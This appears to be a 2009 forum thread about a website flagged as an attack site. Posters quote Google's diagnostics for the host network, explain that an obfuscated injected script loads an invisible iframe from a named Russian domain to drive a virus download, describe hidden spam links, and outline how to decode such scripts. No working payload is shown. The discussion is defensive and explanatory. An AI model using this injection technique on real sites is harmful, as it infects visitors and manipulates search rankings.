Jane, I didn't get that warning when I went there just now in Safari. However, in FF, I did get the attack site warning. What is the IP number associated with the site? It should be on the malware warning at the bottom - but you've covered it with the attack site warning I think. Since I'm not getting the malware warning, I can't see it.
When I click on the link to the Google diagnostics in the attack site warning I get this:
QUOTE
What happened when Google visited sites hosted on this network?
Of the 15276 site(s) we tested on this network over the past 90 days, 2065 site(s), including, for example, couponsdeal.com/, tjw-uk.com/, worldofmen.org/, served content that resulted in malicious software being downloaded and installed without user consent.
The last time Google tested a site on this network was on 2009-02-04, and the last time suspicious content was found was on 2009-02-04.
Has this network hosted sites acting as intermediaries for further malware distribution?
Over the past 90 days, we found 46 site(s) on this network, including, for example, free-social-tools.com/, sudokus2go.com/, woodyspornnetwork.com/, that appeared to function as intermediaries for the infection of 140 other site(s) including, for example, hausverwaltersuche.de/, caw2.com/, downloadyoutubevids.com/.
Has this network hosted sites that have distributed malware?
Yes, this network has hosted sites that have distributed malicious software in the past 90 days. We found 127 site(s), including, for example, xdxbx.com/, worldvedro.com/, free-social-tools.com/, that infected 1666 other site(s), including, for example, bedoon.net/, almosafr.com/, samaq8.com/.
Next steps:
* Return to the previous page.
Updated 4 hours ago
The service provider, servage.net in Germany, appears to be having some ongoing issues - apparently not solved as this site claims:
http://allensmithnet.vox.com/library/post/...ensmithnet.html
QUOTE
A question, what the heck does the criminal gain by doing such a thing?
In this case, money. (See some of the links I listed - they more or less explain things.) The virus probably does something like allow your computer to be taken over remotely by the hackers to send out masses of spam; some of which of course does stuff like drive people to fake PayPal or bank sites.
As for keeping search engines off your site, you should also create a robots.txt file. Instructions here:
http://www.e-myth.com/cs/user/print/post/w...-block-the-bots (and look at the NYT example he links to - you could copy it and just add all the major search engines)
Tacit, is it the script at the top of the page or the one at the bottom (and how did you dig that bit of info out...I looked at it and couldn't make head or tail of it)
The one at the top.
The script is written in a highly obfuscated way, but it's easy to decode if you know a little bit about how JavaScript works.
These obfuscated scripts work by taking an encoded string, decoding it, and then putting it into the Web page by using a document.write command or an eval command. You can sort them out by saving the HTML to disk, opening them in a text editor, and looking for anything that says document.write or eval. You change the document.write or eval command to alert (the command to pop up abox), then open the HTML ile in your browser. A window will pop up containing the decoded JavaScript.
In this case, the decoded JavaScript opens an invisible iFrame from http://7speed.info, a site hosted in Russia. The invisible frame contains instructions to trick Internet Explorer into downloading a virus.
Also - there are a bunch of invisible links on that page - mostly to porn sites, so my guess is those were dumped in there by the hacker too. I had to wonder what was the point of having invisible links - until I read a bit more about this issue. (see below) The javascript is what makes them invisible, since it has "display = none" in there, and they're not popups. Google takes a very dim view of invisible links; generally one's page rank will drop badly if you have them, so it's not just the virus problem isn't the only hack going on here.
Yes. Technically, the "display = none" isn't JavaScript, it's CSS.
All kinds of sites use this CSS. For example, if you go to a Web site that causes a picture to appear in the middle of the screen when you click a link (iWeb can do this), the picture is actually always there. It's loaded when the page loads but it is set to display = none. When you click a button or a link the display = none is changed and bink! There it is, like magic.
The purpose of putting the hidden porn links in there is money. Google's page rank works by the number of people who link *to you*. The more other web sites that link to you, the higher your page appears in the searches. So hackers make their own pages appear higher in Google's searches by hacking other people's sites and then placing links on the hacked sites to their own sites.
The nasty thing is that without the virus in there as well, the problems on that site could very well have gone undetected for ages if the page is not updated. I think I'll email the site owner. I'm assuming he doesn't have a clue about this.
That would probably be a good idea, but I think the site owner may be MIA.